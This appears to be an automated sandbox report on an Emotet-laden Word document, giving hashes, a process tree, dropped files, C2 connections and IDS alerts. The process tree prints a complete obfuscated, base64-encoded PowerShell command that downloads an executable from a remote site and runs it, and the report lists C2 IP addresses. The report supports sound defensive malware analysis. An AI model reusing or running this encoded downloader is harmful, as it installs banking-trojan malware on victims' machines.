download: | 4sx8q-wzprpwl-dnyre |
Full analysis: | https://app.any.run/tasks/eb93cd7d-f867-40d7-ba44-50654b4d1f57 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 15, 2019, 12:30:16 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Apr 15 07:56:00 2019, Last Saved Time/Date: Mon Apr 15 07:56:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 11, Security: 0 |
MD5: | C8C1C3683A17C037ED9D64D7130D026A |
SHA1: | FAE6BFF005238837CE12FC5BD7030ABEFC8A1FF7 |
SHA256: | 32F07F132265AA1F9155AF93D8D0C0AC8D89B3972D33F5DBD25F53AB4EF9E5F7 |
SSDEEP: | 6144:L77HUUUUUUUUUUUUUUUUUUUT52VCPQAMUA0AUJkJn09YM:L77HUUUUUUUUUUUUUUUUUUUTCEQ1UAnI |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 11 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 11 |
Words: | 1 |
Pages: | 1 |
ModifyDate: | 2019:04:15 06:56:00 |
CreateDate: | 2019:04:15 06:56:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1080 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4sx8q-wzprpwl-dnyre.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 Modules
| |||||||||||||||
1276 | PoWeRsHelL -e JABtAEEAUQA0AEIAQQBVADQAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAagAnACwAJwBaAEEAQwAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAF8AQwAnACwAJwBfAEEAJwApACkAOwAkAHUAWABEAEEAQQBVACAAPQAgACcANAAyADEAJwA7ACQATQBBAFgAMQBYAHcAXwA9ACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAEEAQQBBACcALAAnADEAWgAnACkALAAnAF8AJwApADsAJABGAEMAawAxAFUAQwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBYAEQAQQBBAFUAKwAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlACcALAAnAC4AZQB4ACcAKQA7ACQASgBEAFEAUQBBAEIAQQB3AD0AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBYAFoAJwAsACcAUQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBsAEEAWAAnACwAJwBBAGMAJwApACkAOwAkAEoAQQBRAEEAQQBRAD0AJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAGAAVwBgAEUAQgBjAGwAaQBlAGAATgB0ADsAJABiAFEAawBjAEEAawBHAEEAPQAoACIAewAxADAAfQB7ADUAfQB7ADEANQB9AHsAMgAwAH0AewAxADMAfQB7ADIAfQB7ADcAfQB7ADIANAB9AHsANgB9AHsAMQB9AHsAOAB9AHsAMAB9AHsAMgA4AH0AewAyADIAfQB7ADkAfQB7ADEANwB9AHsAMgA3AH0AewAxADQAfQB7ADMAMQB9AHsAMwB9AHsAMQAyAH0AewAyADEAfQB7ADIANgB9AHsAMwAwAH0AewAyADUAfQB7ADQAfQB7ADIAOQB9AHsAMQA2AH0AewAxADgAfQB7ADEAMQB9AHsAMgAzAH0AewAxADkAfQAiAC0AZgAgACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcAYQBnAGkAJwAsACcALgBpACcALAAnAGUAcgBtACcAKQAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAXwAnACwAJwBNAC8AQABoACcAKQAsACcALwAvACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAHAAOgAnACwAJwB0AHQAJwApACkALAAoACIAewA1AH0AewA0AH0AewAxAH0AewAwAH0AewAyAH0AewAzAH0AIgAtAGYAIAAnAG0AaQAnACwAJwBhAGQAJwAsACcAbgAvACcALAAnAHgAXwBnACcALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAnAGMAbwBtAC8AJwAsACcAOAAuACcALAAnAHcAcAAtACcAKQAsACcAaAAyADIAJwApACwAJwBLACcALAAoACIAewA1AH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AewAyAH0AewA2AH0AIgAgAC0AZgAgACcAdAAnACwAJwBnAGUAdAAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBmAGkAdAAnACwAJwBhAHQANQAnACkALAAnADoALwAvACcALAAnAHQAcAAnACwAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBJAF8AOABMAC8AQABoACcALAAnADIAJwAsACcALwBJACcAKQAsACcAMAAnACkALAAnAHAAJwAsACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACAAJwAvAHQAZgAnACwAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAIAAnAGUAdAAnACwAJwBuACcALAAnAC8AaQBtAGEAJwApACwAJwBnAGUAcwAnACkALAAoACIAewAyAH0AewAwAH0AewAxAH0AewAzAH0AIgAtAGYAIAAnAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBrACcALAAnAC8AaABlACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcALwBAAGgAJwAsACcAdAB0AHAAOgAnACkALAAnAGUAJwApACwAJwBoACcALAAnAHAAJwAsACcAaAB0AHQAJwAsACcAbgAnACwAKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBAAGgAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAOgAvACcALAAnAHQAdABwACcAKQAsACcAZQAnACwAJwAvACcAKQAsACcAcgBjACcALAAnAHUAZAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC8ALwAnACwAJwBjAGgAJwApACwAJwA6ACcAKQAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAHAALQAnACwAJwBjAG8AJwApACwAJwB3ACcALAAnAG0ALwAnACkALAAnAC0AaQAnACwAJwBuAHQAZQAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwA0ACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBfAEUAcQAnACwAJwAvACcAKQApACwAJwB1ACcALAAnAC8AdABlACcALAAnAHcAJwAsACcAdAAvAHoAJwAsACcALgAnACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwB0ACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAZABvAHMAJwAsACcAYQAnACkALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBzACcALAAnAHgALwBFACcAKQApACwAJwBwAGEAJwAsACcAbgBjAGwAJwAsACcAcgAvACcALAAnAC4AYwBvACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAZAAnACwAJwBpAC4AbQAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBlAHMAJwAsACcALwBpAE0AJwApACwAJwBfACcAKQApAC4AIgBzAGAAUABMAGkAdAAiACgAJwBAACcAKQA7ACQAUgBBAFEAQwBBAEIAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwA0AEIAJwAsACcAYwBvACcAKQAsACcAQQAnACkALAAnAG4AQQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABLAEEARAB3AEEAQgAgAGkAbgAgACQAYgBRAGsAYwBBAGsARwBBACkAewB0AHIAeQB7ACQASgBBAFEAQQBBAFEALgAiAEQAYABPAHcATgBsAG8AYABBAGQAYABGAEkAbABlACIAKAAkAEsAQQBEAHcAQQBCACwAIAAkAEYAQwBrADEAVQBDACkAOwAkAGYAQgBCAEEAWABBAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFUAQQAnACwAJwBBAEQAYwAnACkALAAnAHYAJwAsACcAQQBfACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABGAEMAawAxAFUAQwApAC4AIgBsAGUAbgBgAEcAdABoACIAIAAtAGcAZQAgADMAMAA2ADAAMwApACAAewAuACgAJwBJAG4AJwArACcAdgAnACsAJwBvAGsAJwArACcAZQAtAEkAdABlAG0AJwApACAAJABGAEMAawAxAFUAQwA7ACQAZgBvAEQAQQBaAG8AdwBRAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACcAQQAnACwAJwBpAEEAQQAnACwAJwBrAG8AJwApADsAYgByAGUAYQBrADsAJABOAF8AMQB3AEIAQQBrAHgAPQAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAJwBXAEcAJwAsACcAeABYACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcARABBAEEAJwAsACcAVQAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVABYAEMAQQBjAFoAQQBDAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACcAegAnACwAJwBVACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAQQAnACwAJwBBAEEAUQAnACkALAAnAGsAVQAnACkAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe | WmiPrvSE.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2240 | "C:\Users\admin\421.exe" | C:\Users\admin\421.exe | — | PoWeRsHelL.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
3116 | --725acb31 | C:\Users\admin\421.exe | 421.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
2388 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 421.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
2636 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
2484 | "C:\Users\admin\AppData\Local\soundser\zFgFNiwizdA6Tl.exe" | C:\Users\admin\AppData\Local\soundser\zFgFNiwizdA6Tl.exe | — | soundser.exe | |||||||||||
User: admin Company: 360. cn Integrity Level: MEDIUM Description: 360 FirstAid Exit code: 0 Version: 1, 0, 0, 1007 Modules
| |||||||||||||||
3104 | --46b75816 | C:\Users\admin\AppData\Local\soundser\zFgFNiwizdA6Tl.exe | zFgFNiwizdA6Tl.exe | ||||||||||||
User: admin Company: 360. cn Integrity Level: MEDIUM Description: 360 FirstAid Exit code: 0 Version: 1, 0, 0, 1007 Modules
| |||||||||||||||
1924 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | zFgFNiwizdA6Tl.exe | ||||||||||||
User: admin Company: 360. cn Integrity Level: MEDIUM Description: 360 FirstAid Exit code: 0 Version: 1, 0, 0, 1007 Modules
| |||||||||||||||
3656 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | ||||||||||||
User: admin Company: 360. cn Integrity Level: MEDIUM Description: 360 FirstAid Version: 1, 0, 0, 1007 Modules
|
PID | Process | Filename | Type | |
---|---|---|---|---|
1080 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6C71.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1276 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\29J9NLDRBB50TJZ0NU58.temp | — | |
MD5:— | SHA256:— | |||
1080 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BAEC04A54AC968DB29FEE2F2ABDA0EA1 | SHA256:230C0E0381E2EA1B4CED9700B32635C2548CB4B0CE50C1D60F5BF49BA8E63985 | |||
1080 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:3F569A8218CBE775F795510337AD8936 | SHA256:1FC2FDE26EE1F2247EB64B9FAE46FA33DBD991E746DC7CE1D7C2C44F247932E9 | |||
1276 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
1276 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe7b27.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
3104 | zFgFNiwizdA6Tl.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:A8D7159693A8605DFD59C96F903836C7 | SHA256:2780491678D55C4C006F0F4A6A22312736CD2E2B2CCACA42FF6CC437C701F530 | |||
1080 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$x8q-wzprpwl-dnyre.doc | pgc | |
MD5:9379273A7646121ED0BD3AA060495B30 | SHA256:9096FF0241BBFC73912E30DF9267E0B1763C76AA4BEB26071A3C21C77D955C84 | |||
2636 | soundser.exe | C:\Users\admin\AppData\Local\soundser\zFgFNiwizdA6Tl.exe | executable | |
MD5:A8D7159693A8605DFD59C96F903836C7 | SHA256:2780491678D55C4C006F0F4A6A22312736CD2E2B2CCACA42FF6CC437C701F530 | |||
3116 | 421.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:346DE7B6C5B26596C227BE24BA1DBC61 | SHA256:7526436A4DC55A848F0517B1204CA7E7D749CFB3BB62C0237605FB9FB2A2BA5C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2636 | soundser.exe | POST | — | 94.11.25.255:80 | http://94.11.25.255/sym/ | GB | — | — | malicious |
3656 | soundser.exe | POST | — | 117.193.28.115:80 | http://117.193.28.115/between/ | IN | — | — | malicious |
1276 | PoWeRsHelL.exe | GET | 200 | 104.18.33.28:80 | http://church228.com/wp-admin/x_g/ | US | executable | 130 Kb | suspicious |
2636 | soundser.exe | POST | — | 117.193.28.115:80 | http://117.193.28.115/schema/codec/ringin/ | IN | — | — | malicious |
3656 | soundser.exe | POST | — | 94.11.25.255:80 | http://94.11.25.255/acquire/ | GB | — | — | malicious |
3656 | soundser.exe | POST | — | 202.133.72.136:443 | http://202.133.72.136:443/health/ | IN | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2636 | soundser.exe | 94.11.25.255:80 | — | Sky UK Limited | GB | malicious |
1276 | PoWeRsHelL.exe | 104.18.33.28:80 | church228.com | Cloudflare Inc | US | shared |
2636 | soundser.exe | 117.193.28.115:80 | — | National Internet Backbone | IN | malicious |
3656 | soundser.exe | 117.193.28.115:80 | — | National Internet Backbone | IN | malicious |
— | — | 202.133.72.136:443 | — | Ddc Broadband Pvt. Ltd. | IN | malicious |
3656 | soundser.exe | 94.11.25.255:80 | — | Sky UK Limited | GB | malicious |
2636 | soundser.exe | 202.133.72.136:443 | — | Ddc Broadband Pvt. Ltd. | IN | malicious |
Domain | IP | Reputation |
---|---|---|
church228.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
1276 | PoWeRsHelL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1276 | PoWeRsHelL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1276 | PoWeRsHelL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1276 | PoWeRsHelL.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
2636 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2636 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3656 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |